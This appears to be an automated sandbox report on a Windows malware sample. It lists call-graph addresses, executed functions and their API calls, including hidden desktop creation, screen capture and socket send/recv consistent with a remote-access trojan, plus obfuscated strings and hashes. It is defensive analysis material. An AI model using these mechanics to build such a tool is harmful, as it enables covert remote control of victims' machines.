91508->91506 91509->91451 91512 6b9c9d0 91511->91512 91513 6b9c9c5 SetThreadExecutionState 91511->91513 91565 6bc0026 GetSystemTimeAsFileTime 91512->91565 91513->91512 91515 6b9c9d7 91567 6bba7c6 91515->91567 91518 6b9c9fe 91570 6b7d3f0 ConvertStringSecurityDescriptorToSecurityDescriptorA 91518->91570 91519 6b9ca12 91607 6b7d3f0 ConvertStringSecurityDescriptorToSecurityDescriptorA 91519->91607 91522 6b9ca0d GetCurrentThreadId GetThreadDesktop 91571 6b79250 91522->91571 91527 6b9ca60 91528 6b9f800 std::_Throw_Cpp_error 41 API calls 91527->91528 91529 6b9ca6b 91528->91529 91580 6b79080 91529->91580 91532 6b9cf89 LoadLibraryA 91534 6b9d39e LoadLibraryA 91532->91534 91535 6b9d0b4 GetProcAddress 91532->91535 91533 6b9cbb3 GetProcAddress GetProcAddress 91533->91532 91586 6ba7890 91534->91586 91535->91534 91537 6b9d37c 91535->91537 91608 6b7d430 GetModuleHandleA GetProcAddress GetVersionExA 91537->91608 91540 6b9d388 91540->91534 91543->91471 91544->91473 91546 6b9f82d 91545->91546 91548 6b9f894 error_info_injector 91546->91548 91554 6b71b70 41 API calls _Allocate 91546->91554 91548->91486 91549->91475 91550->91475 91551->91481 91552->91487 91553->91492 91554->91548 91555->91496 91557 6ba3147 __DllMainCRTStartup@12 91556->91557 91559 6ba3151 __DllMainCRTStartup@12 91557->91559 91562 6b71c20 43 API calls std::_Xinvalid_argument 91557->91562 91561 6ba316a ctype 91559->91561 91563 6ba5fa0 43 API calls 2 library calls 91559->91563 91561->91504 91562->91559 91563->91561 91564->91509 91566 6bc005f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 91565->91566 91566->91515 91609 6bc47e3 GetLastError 91567->91609 91570->91522 91648 6b9eb10 91571->91648 91573 6b79292 __DllMainCRTStartup@12 91651 6ba1780 91573->91651 91576 6b9ea30 91577 6b9ea4c 91576->91577 91579 6b9ea47 std::_Throw_Cpp_error 91576->91579 91578 6b9f800 std::_Throw_Cpp_error 41 API calls 91577->91578 91578->91579 91579->91527 91664 6ba0270 91580->91664 91583 6b7911d LoadLibraryA 91583->91532 91583->91533 91584 6b790b2 CreateDesktopA 91584->91583 91587 6ba78ad __DllMainCRTStartup@12 91586->91587 91588 6ba7902 GetProcAddress 91587->91588 91589 6ba792f __DllMainCRTStartup@12 91588->91589 91590 6ba7990 GetProcAddress 91589->91590 91591 6ba79c3 __DllMainCRTStartup@12 91590->91591 91592 6ba7a30 GetProcAddress 91591->91592 91607->91522 91608->91540 91610 6bc47f9 91609->91610 91611 6bc47ff 91609->91611 91638 6bc4fc6 6 API calls __FrameHandler3::FrameUnwindToState 91610->91638 91615 6bc4803 91611->91615 91639 6bc5005 6 API calls __FrameHandler3::FrameUnwindToState 91611->91639 91614 6bc481b 91614->91615 91616 6bc4823 91614->91616 91617 6bc4888 SetLastError 91615->91617 91640 6bc43e2 14 API calls 3 library calls 91616->91640 91620 6bc4898 91617->91620 91621 6b9c9e0 GetVersion 91617->91621 91619 6bc4830 91622 6bc4838 91619->91622 91623 6bc4849 91619->91623 91647 6bc127d 41 API calls __FrameHandler3::FrameUnwindToState 91620->91647 91621->91518 91621->91519 91641 6bc5005 6 API calls __FrameHandler3::FrameUnwindToState 91622->91641 91642 6bc5005 6 API calls __FrameHandler3::FrameUnwindToState 91623->91642 91627 6bc489d 91628 6bc4855 91629 6bc4859 91628->91629 91630 6bc4870 91628->91630 91643 6bc5005 6 API calls __FrameHandler3::FrameUnwindToState 91629->91643 91645 6bc45e5 14 API calls __Getctype 91630->91645 91634 6bc487b 91646 6bc443f 14 API calls __dosmaperr 91634->91646 91635 6bc4846 91644 6bc443f 14 API calls __dosmaperr 91635->91644 91636 6bc486d 91636->91617 91638->91611 91639->91614 91640->91619 91641->91635 91642->91628 91643->91635 91644->91636 91645->91634 91646->91636 91647->91627 91655 6ba2e50 91648->91655 91650 6b9eb7c 91650->91573 91652 6b792d3 91651->91652 91653 6ba1794 91651->91653 91652->91576 91653->91652 91663 6bba7a5 41 API calls __Getctype 91653->91663 91656 6ba2e67 __DllMainCRTStartup@12 91655->91656 91657 6ba2e71 __DllMainCRTStartup@12 91656->91657 91661 6b71c20 43 API calls std::_Xinvalid_argument 91656->91661 91659 6ba2e8a _memcpy_s 91657->91659 91662 6ba5fa0 43 API calls 2 library calls 91657->91662 91659->91650 91661->91657 91662->91659 91663->91653 91665 6b79093 OpenDesktopA 91664->91665 91665->91583 91665->91584 92372 be2ee0 92373 be2ef4 92372->92373 92375 be3078 92373->92375 92377 be2fa2 92373->92377 92378 be35c0 GetLastError 92373->92378 92376 be38b0 GetLastError 92376->92375 92377->92375 92377->92376 92378->92377 92379 afdc50 92380 afdc9d 92379->92380 92381 afdd70 std::_Throw_Cpp_error 92379->92381 92385 b85f70 92380->92385 92389 b21b90 92381->92389 92384 afde15 92388 b85fd6 std::locale::_Locimp::_Locimp 92385->92388 92386 b8612c 92386->92381 92387 ae1c96 ___std_exception_destroy GetLastError 92387->92386 92388->92386 92388->92387 92390 b86c20 10 API calls 92389->92390 92410 b21bec std::_Throw_Cpp_error std::_Facet_Register 92390->92410 92391 b243bc 92391->92384 92392 b24409 std::_Throw_Cpp_error 92444 aa7b10 GetLastError std::ios_base::_Ios_base_dtor ___std_exception_destroy 92392->92444 92394 b24504 std::_Throw_Cpp_error 92445 aa7b10 GetLastError std::ios_base::_Ios_base_dtor ___std_exception_destroy 92394->92445 92395 b243de std::_Throw_Cpp_error 92443 aa7b10 GetLastError std::ios_base::_Ios_base_dtor ___std_exception_destroy 92395->92443 92397 b24543 92399 abb0e0 GetLastError 92399->92410 92400 b24448 Concurrency::cancel_current_task std::_Throw_Cpp_error 92401 aa7cf0 GetLastError 92400->92401 92404 b244b0 std::_Throw_Cpp_error 92401->92404 92402 ae12b7 6 API calls 92402->92410 92403 abaf80 GetLastError 92403->92410 92405 aa7cf0 GetLastError 92404->92405 92405->92394 92406 b22713 SHGetFolderPathA 92406->92410 92407 b22a15 SHGetFolderPathA 92407->92410 92408 b22d13 SHGetFolderPathA 92408->92410 92409 b23073 SHGetFolderPathA 92409->92410 92410->92391 92410->92392 92410->92394 92410->92395 92410->92399 92410->92400 92410->92402 92410->92403 92410->92404 92410->92406 92410->92407 92410->92408 92410->92409 92410->92410 92411 b2339b SHGetFolderPathA 92410->92411 92412 b236a5 SHGetFolderPathA 92410->92412 92414 ab85d0 8 API calls 92410->92414 92415 b24560 92410->92415 92411->92410 92412->92410 92414->92410 92416 b245c1 92415->92416 92417 b86c20 10 API calls 92416->92417 92420 b25d5a Concurrency::cancel_current_task 92416->92420 92418 b245d1 std::_Throw_Cpp_error 92417->92418 92419 b249b8 std::_Throw_Cpp_error 92418->92419 92421 b65f80 GetLastError 92418->92421 92427 b25bf9 92418->92427 92422 b65f80 GetLastError 92419->92422 92419->92427 92437 b24647 std::_Throw_Cpp_error 92421->92437 92442 b249ef std::ios_base::_Ios_base_dtor std::_Throw_Cpp_error std::_Facet_Register 92422->92442 92423 b249a6 92425 ab85d0 8 API calls 92423->92425 92424 b25be7 92426 ab85d0 8 API calls 92424->92426 92425->92419 92426->92427 92428 ab85d0 8 API calls 92427->92428 92430 b25cc0 92428->92430 92432 ab85d0 8 API calls 92430->92432 92431 b25f20 8 API calls 92431->92442 92433 b25ccf 92432->92433 92433->92410 92434 b247f0 CreateDirectoryA 92434->92437 92435 ab5350 GetLastError 92435->92437 92437->92423 92437->92434 92437->92435 92439 b24560 21 API calls 92437->92439 92446 b25f20 92437->92446 92439->92437 92441 b24fb2 CreateDirectoryA 92441->92442 92442->92420 92442->92424 92442->92431 92442->92441 92450 ab5350 92442->92450 92457 b25d70 92442->92457 92467 b871a0 16 API calls 92442->92467 92443->92392 92444->92400 92445->92397 92447 b25f59 92446->92447 92448 ab85d0 8 API calls 92447->92448 92449 b25fa1 92448->92449 92449->92437 92451 ab53d7 std::_Throw_Cpp_error std::_Facet_Register 92450->92451 92452 ab53a0 Concurrency::cancel_current_task std::_Facet_Register 92450->92452 92451->92442 92452->92451 92468 ab9c20 92452->92468 92454 aa4900 std::_Throw_Cpp_error GetLastError 92455 ab556c 92454->92455 92455->92442 92456 ab54d5 92456->92454 92458 b25edf 92457->92458 92466 b25db0 92457->92466 92459 ab85d0 8 API calls 92458->92459 92461 b25eed 92459->92461 92460 ad2729 std::_Throw_Cpp_error 6 API calls 92460->92466 92461->92442 92463 aba060 std::_Throw_Cpp_error 8 API calls 92463->92466 92466->92458 92466->92460 92466->92463 92476 abd260 8 API calls 5 library calls 92466->92476 92477 abc160 GetLastError std::ios_base::_Ios_base_dtor std::_Facet_Register 92466->92477 92478 ac23e0 92466->92478 92467->92442 92469 ab9c4a 92468->92469 92470 ab9c76 92468->92470 92472 aa4900 std::_Throw_Cpp_error GetLastError 92469->92472 92471 ab9c82 92470->92471 92475 ab50e0 GetLastError std::_Throw_Cpp_error 92470->92475 92471->92456 92474 ab9c63 92472->92474 92474->92456 92475->92471 92476->92466 92477->92466 92479 ac240c 92478->92479 92480 ac241f 92478->92480 92479->92466 92483 abfb40 92480->92483 92482 ac2537 std::ios_base::_Ios_base_dtor 92482->92466 92484 abfb5b 92483->92484 92485 abfb68 92483->92485 92484->92482 92487 abfb86 92485->92487 92489 ac9c70 92485->92489 92487->92482 92488 abfb7f 92488->92482 92492 ac9ca2 Concurrency::cancel_current_task std::_Facet_Register 92489->92492 92491 ac9dd9 92493 ac9d8f std::ios_base::_Ios_base_dtor 92492->92493 92494 ab9950 92492->92494 92493->92488 92495 ab9968 92494->92495 92496 ab9978 std::ios_base::_Ios_base_dtor 92494->92496 92495->92496 92503 ad2b74 92495->92503 92496->92491 92500 ab99dd 92510 abc430 8 API calls 4 library calls 92500->92510 92502 ab9a04 92502->92491 92505 ad2af7 92503->92505 92504 ab99cc 92504->92496 92509 ab83b0 6 API calls 92504->92509 92505->92504 92506 add5f6 14 API calls 92505->92506 92507 ad2b5e 92506->92507 92507->92504 92508 add0a8 16 API calls 92507->92508 92508->92504 92509->92500 92510->92502

                                                                          Executed Functions

                                                                          Function 06B83B60 Relevance: 190.8, APIs: 77, Strings: 26, Instructions: 10593networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __aulldiv.LIBCMT ref: 06B84E33
                                                                          • send.WS2_32(?,?,?,00000000), ref: 06B85003
                                                                          • __aulldiv.LIBCMT ref: 06B84954
                                                                            • Part of subcall function 06B74630: __aulldiv.LIBCMT ref: 06B746B2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __aulldiv$send
                                                                          • String ID: ^^$%>#6$&V\$),'$,'$Button$Cqu=$Cqu=$Cqu=$C~xx$C~xx$Ea=y$GVwe$GVwe$H%f0$HjDBKYOik35wJkl$I{uo$J`sv$J`sv$TluK$TluK$Tzxx$Tzxx$U3?2$U3?2$g}n
                                                                          • API String ID: 3864168910-3234738182
                                                                          • Opcode ID: 33eada6bba48bfd7b18e6493156ce8f33946ea47424347ec481c46f1f7baf22b
                                                                          • Instruction ID: 2d611f70caedf65ee19e6af107e4e04f6955a479296650a5cdd50b4c23e743e1
                                                                          • Opcode Fuzzy Hash: 33eada6bba48bfd7b18e6493156ce8f33946ea47424347ec481c46f1f7baf22b
                                                                          • Instruction Fuzzy Hash: 6054EFB4D092A88BDB65CF28C894AE9BBB1AF49304F1481EAD44DA7351EB305FC5CF51
                                                                          Function 00B4A180 Relevance: 107.5, APIs: 10, Strings: 40, Instructions: 20001COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00B4A1F7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FolderPath
                                                                          • String ID: a"@$ {q$ {q$ {q$ {q$ {q$ {q$ {q$ {q$ {q$##r$%<t$)!D$+|rR$/pb($/}H)$2c~($<r{/$>0u$>0u$?a{v$E}xS$MJRh$Ml$Ml$Ml$Ml$Ml$Ml$Ml$QO1j$Z@*j$\X7j$cannot use operator[] with a string argument with $cannot use push_back() with $e]L$f3{;$oA]$oA]$Dn
                                                                          • API String ID: 1514166925-1358879020
                                                                          • Opcode ID: a9c4beae145e12a3c2f09d7b34daa5e10aa95df85638089ec8ad9fe43c027f9f
                                                                          • Instruction ID: fbb6e8181c9187b7ff7a520b6eaa5fdbb35bc091d964a7d791002a2aa3255953
                                                                          • Opcode Fuzzy Hash: a9c4beae145e12a3c2f09d7b34daa5e10aa95df85638089ec8ad9fe43c027f9f
                                                                          • Instruction Fuzzy Hash: C9B423B4D052688BDB25DF68C980BEDBBB5BF49304F1082DAD849A7242DB716F84CF51
                                                                          Function 06B9C230 Relevance: 68.7, APIs: 37, Strings: 2, Instructions: 474threadsleepwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 5689 6b9c230-6b9c25b SetThreadExecutionState 5690 6b9c268-6b9c284 CreateThread 5689->5690 5691 6b9c25d-6b9c262 SetThreadExecutionState 5689->5691 5692 6b9c290-6b9c2c6 GetDesktopWindow GetWindowRect 5690->5692 5693 6b9c286-6b9c28a CloseHandle 5690->5693 5691->5690 5694 6b9c2c8-6b9c2d0 GetSystemMetrics 5692->5694 5695 6b9c2d3-6b9c2d7 5692->5695 5693->5692 5694->5695 5696 6b9c2d9-6b9c2e1 GetSystemMetrics 5695->5696 5697 6b9c2e4-6b9c32c call 6b73230 GetDC call 6bb4a9b 5695->5697 5696->5697 5702 6b9c332-6b9c346 CreateCompatibleDC 5697->5702 5703 6b9c977-6b9c986 5697->5703 5704 6b9c34c-6b9c368 CreateCompatibleBitmap 5702->5704 5705 6b9c945-6b9c974 call 6b73230 ReleaseDC call 6bb4a9b 5702->5705 5707 6b9c93b-6b9c93f DeleteDC 5704->5707 5708 6b9c36e-6b9c376 SelectObject 5704->5708 5705->5703 5707->5705 5710 6b9c37c-6b9c383 5708->5710 5712 6b9c389-6b9c3cc call 6b794e0 call 6b73230 5710->5712 5713 6b9c931-6b9c935 DeleteObject 5710->5713 5719 6b9c3d6-6b9c3e5 5712->5719 5713->5707 5720 6b9c3f0 5719->5720 5721 6b9c3e7-6b9c3ee 5719->5721 5722 6b9c3f7-6b9c403 5720->5722 5721->5722 5723 6b9c409-6b9c45d 5722->5723 5724 6b9c4d3-6b9c4f5 call 6bb4a9b 5722->5724 5726 6b9c45f 5723->5726 5727 6b9c4ce call 6b9f0c0 5723->5727 5733 6b9c527-6b9c53a GetCurrentThreadId GetThreadDesktop 5724->5733 5734 6b9c4f7-6b9c505 SetThreadDesktop 5724->5734 5730 6b9c46d-6b9c4c9 shutdown closesocket call 6ba21e0 call 6b9f4b0 5726->5730 5731 6b9c461-6b9c46b 5726->5731 5727->5719 5730->5727 5731->5727 5731->5730 5737 6b9c549-6b9c55c GetCurrentThreadId GetThreadDesktop 5733->5737 5738 6b9c53c-6b9c543 SetThreadDesktop 5733->5738 5736 6b9c50b-6b9c514 5734->5736 5741 6b9c520 5736->5741 5742 6b9c516-6b9c51e Sleep 5736->5742 5743 6b9c58b-6b9c5b0 BitBlt 5737->5743 5744 6b9c55e-6b9c589 call 6b9c110 5737->5744 5738->5737 5741->5733 5742->5736 5745 6b9c5b6-6b9c5db 5743->5745 5744->5745 5747 6b9c5dd 5745->5747 5748 6b9c646-6b9c66b 5745->5748 5750 6b9c5eb-6b9c641 DeleteObject DeleteDC call 6b73230 ReleaseDC call 6bb4a9b 5747->5750 5751 6b9c5df-6b9c5e9 5747->5751 5752 6b9c66d 5748->5752 5753 6b9c684 5748->5753 5750->5692 5751->5748 5751->5750 5755 6b9c67b-6b9c682 5752->5755 5756 6b9c66f-6b9c679 5752->5756 5757 6b9c68b-6b9c697 5753->5757 5755->5757 5756->5753 5756->5755 5759 6b9c699-6b9c6a4 5757->5759 5760 6b9c6aa-6b9c6b1 5757->5760 5759->5760 5761 6b9c6bc-6b9c6c7 Sleep 5760->5761 5762 6b9c6b3-6b9c6ba 5760->5762 5761->5710 5762->5761 5764 6b9c6cc-6b9c6d5 5762->5764 5766 6b9c6db-6b9c706 GetSystemMetrics * 2 5764->5766 5767 6b9c8e3-6b9c8ea 5764->5767 5768 6b9c70c-6b9c71f GetCurrentThreadId GetThreadDesktop 5766->5768 5769 6b9c85e-6b9c8ad call 6b73230 call 6b7dcc0 call 6bb4a9b 5766->5769 5770 6b9c8ec-6b9c8fd 5767->5770 5771 6b9c921-6b9c926 Sleep 5767->5771 5768->5769 5772 6b9c725-6b9c72c 5768->5772 5800 6b9c8b8-6b9c8c9 5769->5800 5801 6b9c8af-6b9c8b6 5769->5801 5770->5771 5773 6b9c8ff-6b9c91d 5770->5773 5775 6b9c92c 5771->5775 5776 6b9c79d-6b9c7a4 5772->5776 5777 6b9c72e-6b9c742 5772->5777 5773->5771 5775->5710 5783 6b9c7f7-6b9c7fe 5776->5783 5784 6b9c7a6-6b9c7be call 6bb548e 5776->5784 5780 6b9c74d 5777->5780 5781 6b9c744-6b9c74b 5777->5781 5787 6b9c754-6b9c760 5780->5787 5781->5787 5783->5769 5788 6b9c800-6b9c812 5783->5788 5795 6b9c7c0-6b9c7d2 call 6b7d6b0 5784->5795 5796 6b9c7d4 5784->5796 5793 6b9c762-6b9c773 5787->5793 5794 6b9c776-6b9c798 call 6bb0390 5787->5794 5791 6b9c853-6b9c85b 5788->5791 5792 6b9c814-6b9c851 SwitchDesktop SetThreadDesktop 5788->5792 5791->5769 5792->5769 5793->5794 5794->5776 5802 6b9c7db-6b9c7f1 5795->5802 5796->5802 5807 6b9c8d7-6b9c8e1 Sleep 5800->5807 5801->5800 5806 6b9c8cb-6b9c8d4 5801->5806 5802->5783 5806->5807 5807->5775
                                                                          APIs
                                                                          • SetThreadExecutionState.KERNEL32(80000041), ref: 06B9C253
                                                                          • SetThreadExecutionState.KERNEL32(80000001), ref: 06B9C262
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00021980,00000000,00000000,00000000), ref: 06B9C277
                                                                          • CloseHandle.KERNEL32(00000000), ref: 06B9C28A
                                                                          • GetDesktopWindow.USER32 ref: 06B9C290
                                                                          • GetWindowRect.USER32(?,?), ref: 06B9C2AA
                                                                          • GetSystemMetrics.USER32(00000000), ref: 06B9C2CA
                                                                          • GetSystemMetrics.USER32(00000001), ref: 06B9C2DB
                                                                          • GetDC.USER32(00000000), ref: 06B9C301
                                                                          • CreateCompatibleDC.GDI32(580107E9), ref: 06B9C339
                                                                          • CreateCompatibleBitmap.GDI32(580107E9,00000000,00000000), ref: 06B9C35B
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 06B9C376
                                                                          • shutdown.WS2_32(?,00000002), ref: 06B9C484
                                                                          • closesocket.WS2_32 ref: 06B9C49F
                                                                          • SetThreadDesktop.USER32(0000010C), ref: 06B9C505
                                                                          • Sleep.KERNEL32(00000064), ref: 06B9C518
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B9C527
                                                                          • GetThreadDesktop.USER32(00000000), ref: 06B9C52E
                                                                          • SetThreadDesktop.USER32(00000A84), ref: 06B9C543
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B9C549
                                                                          • GetThreadDesktop.USER32(00000000), ref: 06B9C550
                                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000500,00000400,580107E9,00000000,00000000,00CC0020), ref: 06B9C5B0
                                                                          • DeleteObject.GDI32(00000000), ref: 06B9C600
                                                                          • DeleteDC.GDI32(00000000), ref: 06B9C60A
                                                                          • ReleaseDC.USER32(00000000,580107E9), ref: 06B9C622
                                                                          • Sleep.KERNEL32(000003E8), ref: 06B9C6C1
                                                                          • GetSystemMetrics.USER32(00000000), ref: 06B9C6E3
                                                                          • GetSystemMetrics.USER32(00000001), ref: 06B9C6F1
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B9C70C
                                                                          • GetThreadDesktop.USER32(00000000), ref: 06B9C713
                                                                          • SwitchDesktop.USER32(0000010C), ref: 06B9C83E
                                                                          • SetThreadDesktop.USER32(00000A84), ref: 06B9C84B
                                                                          • Sleep.KERNEL32(?), ref: 06B9C8DB
                                                                          • Sleep.KERNEL32(00000BB8), ref: 06B9C926
                                                                          • DeleteObject.GDI32(00000000), ref: 06B9C935
                                                                          • DeleteDC.GDI32(00000000), ref: 06B9C93F
                                                                          • ReleaseDC.USER32(00000000,580107E9), ref: 06B9C958
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Thread$Desktop$DeleteMetricsSleepSystem$CreateCurrentObject$CompatibleExecutionReleaseStateWindow$BitmapCloseHandleRectSelectSwitchclosesocketshutdown
                                                                          • String ID: HjDBKYOik35wJkl$P
                                                                          • API String ID: 1429317180-3505193903
                                                                          • Opcode ID: cc7ebab838998ccf0bbe7eb480c68a811d11dee94939a35d35fc740b56b99e4f
                                                                          • Instruction ID: 25b5753996df07da00a1df021eaaf9f96792d69b551b6ec29c69361b2ced876a
                                                                          • Opcode Fuzzy Hash: cc7ebab838998ccf0bbe7eb480c68a811d11dee94939a35d35fc740b56b99e4f
                                                                          • Instruction Fuzzy Hash: 62224AF4D01258DFDB54DFA8D894BADBBB6FB88300F1081A9E609AB381D7759944CF60
                                                                          Function 06B9C990 Relevance: 39.1, APIs: 14, Strings: 8, Instructions: 575librarythreadloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetThreadExecutionState.KERNEL32(80000041), ref: 06B9C9BB
                                                                          • SetThreadExecutionState.KERNEL32(80000001), ref: 06B9C9CA
                                                                            • Part of subcall function 06B7D3F0: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(06B9CA21,00000001,06BEA924,00000000), ref: 06B7D41D
                                                                          • GetVersion.KERNEL32 ref: 06B9C9E3
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B9CA24
                                                                          • GetThreadDesktop.USER32(00000000), ref: 06B9CA2B
                                                                          • LoadLibraryA.KERNEL32(?,?,0000000F), ref: 06B9CB9A
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06B9CD93
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06B9CF7E
                                                                          • LoadLibraryA.KERNEL32(?), ref: 06B9D09B
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06B9D367
                                                                          • LoadLibraryA.KERNEL32(?), ref: 06B9D4B0
                                                                          • GdiplusStartup.GDIPLUS(?,00000001,00000000), ref: 06B9D4F7
                                                                          • CreateThread.KERNEL32(00000000,00000000,06B9C230,00000000,00000000,00000000), ref: 06B9D50C
                                                                          • CloseHandle.KERNEL32(00000000), ref: 06B9D528
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Thread$AddressLibraryLoadProc$DescriptorExecutionSecurityState$CloseConvertCreateCurrentDesktopGdiplusHandleStartupStringVersion
                                                                          • String ID: C}Sr$D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$HjDBKYOik35wJkl$Id`o$J'tq$RlTt$S:(ML;;NW;;;LW)$hLD3
                                                                          • API String ID: 4097687401-865544600
                                                                          • Opcode ID: 70ec02a44e1781fe8f002a881dfba76d7f744d2d7a93246b2da0a255c8f92975
                                                                          • Instruction ID: 0991a7bf23a270a4e1f417ffd0297dee45de5cf618a2e51060f2b59a50898c79
                                                                          • Opcode Fuzzy Hash: 70ec02a44e1781fe8f002a881dfba76d7f744d2d7a93246b2da0a255c8f92975
                                                                          • Instruction Fuzzy Hash: 8F720DB4D092A88BDB66CF6898817EDBBB1AF59304F1081D9D98CB7211EB305BC5CF51
                                                                          Function 06B91980 Relevance: 26.1, APIs: 16, Instructions: 2090networkthreadsleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetThreadExecutionState.KERNEL32(80000041), ref: 06B919C0
                                                                          • SetThreadExecutionState.KERNEL32(80000001), ref: 06B919CF
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B919E2
                                                                          • GetThreadDesktop.USER32(00000000), ref: 06B919E9
                                                                          • SetThreadDesktop.USER32(00000A84), ref: 06B919FE
                                                                          • recv.WS2_32(00000AD4,00000000,00000004,00000002), ref: 06B91A58
                                                                          • WSAGetLastError.WS2_32 ref: 06B91A61
                                                                          • __aulldiv.LIBCMT ref: 06B928DF
                                                                            • Part of subcall function 06B74630: __aulldiv.LIBCMT ref: 06B746B2
                                                                          • __aulldiv.LIBCMT ref: 06B92DA8
                                                                          • send.WS2_32(?,?,?,00000000), ref: 06B92F53
                                                                          • recv.WS2_32(?,?,0000000C,00000002), ref: 06B93148
                                                                          • recv.WS2_32(?,?,0000000C,00000008), ref: 06B9320A
                                                                          • recv.WS2_32(?,?,00000000,00000008), ref: 06B933C6
                                                                          • Sleep.KERNEL32(0000000A), ref: 06B94093
                                                                          • Sleep.KERNEL32(00000001), ref: 06B9409B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Thread$recv$__aulldiv$DesktopExecutionSleepState$CurrentErrorLastsend
                                                                          • String ID:
                                                                          • API String ID: 4270644286-0
                                                                          • Opcode ID: 1acb88b45bceda5d850d1819a83e208a40298595f0d07448a95e2ea66ba38db5
                                                                          • Instruction ID: 20a3ea74fa2c4e45876e33ec15069ab4fe05d696b35c5c7adcc0f3d8892658ab
                                                                          • Opcode Fuzzy Hash: 1acb88b45bceda5d850d1819a83e208a40298595f0d07448a95e2ea66ba38db5
                                                                          • Instruction Fuzzy Hash: C443CFB4D056688FDBA4CF18C894BEEBBB2AB89300F1481EAD54DA7351D7319E85CF50
                                                                          Function 00B21B90 Relevance: 23.2, APIs: 7, Strings: 5, Instructions: 2202COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B86C20: GetLastError.KERNEL32(?,?,?,00B05C0F), ref: 00B86C87
                                                                          • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00B2272B
                                                                          • SHGetFolderPathA.SHELL32(00000000,00000005,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00B22A27
                                                                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00B22D25
                                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B23085
                                                                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B233B3
                                                                          • SHGetFolderPathA.SHELL32(00000000,00000008,00000000,00000000,?), ref: 00B236B7
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00B24461
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
